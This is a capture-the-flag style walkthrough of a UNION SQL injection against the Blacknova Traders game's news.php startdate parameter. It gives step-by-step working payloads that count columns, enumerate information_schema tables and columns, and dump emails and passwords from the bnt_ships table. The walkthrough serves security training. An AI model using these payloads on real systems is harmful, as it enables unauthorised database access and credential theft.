Walkthrough: SQL Injection - Union (Blacknova Traders)

Tools Used:
From the homepage, click "Rankings". This page is shared by both logged out and logged in users, and so is part of the game. Because of that, it shows a news ticker on the bottom.

Click on the news ticker ("Sorry, no news today") to open up the news page.

On this page, you can see "Previous Day" and "Next Day" controls to toggle what news you are viewing. If you click on those a bit, you'll see a GET parameter is passed in the URL: news.php?startdate=2018/12/23

Based on the original hack, we know this parameter is vulnerable to a UNION sql injection. UNION sql injections tend to follow this pattern:

' UNION SELECT 1,2,3--
The trouble is you have to match the correct number of columns to the table we are doing a UNION with. That's not a big trouble though, just add one column at a time until it renders... eventually, you'll end up on a working inject like this:

news.php?startdate=2018/12/23' UNION SELECT 1,2,3,4,5,6--

This injection renders the second and third values of our UNIONed SELECT statement into the page - we can use this to display the information we extract from the database. Let's re-read the challenge: "Use SQL Injection to obtain the password of the ship/user named [email protected] - their password is the flag."

So we need to find the ship/user table. Let's view the list of tables with this injection:

news.php?startdate=2018/12/23' UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--

Excellent, so the table name we are extracting data from is the bnt_ships table. Now we need to know the column names we want to pull from that table.
news.php?startdate=2018/12/23' UNION SELECT 1,column_name,data_type,4,5,6 FROM information_schema.columns WHERE table_name='bnt_ships'--

Well we need the password, and the challenge text provided the email we're looking for, so let's use those fields.

news.php?startdate=2018/12/23' UNION SELECT 1,email,password,4,5,6 FROM bnt_ships--

Boom, we have the flag.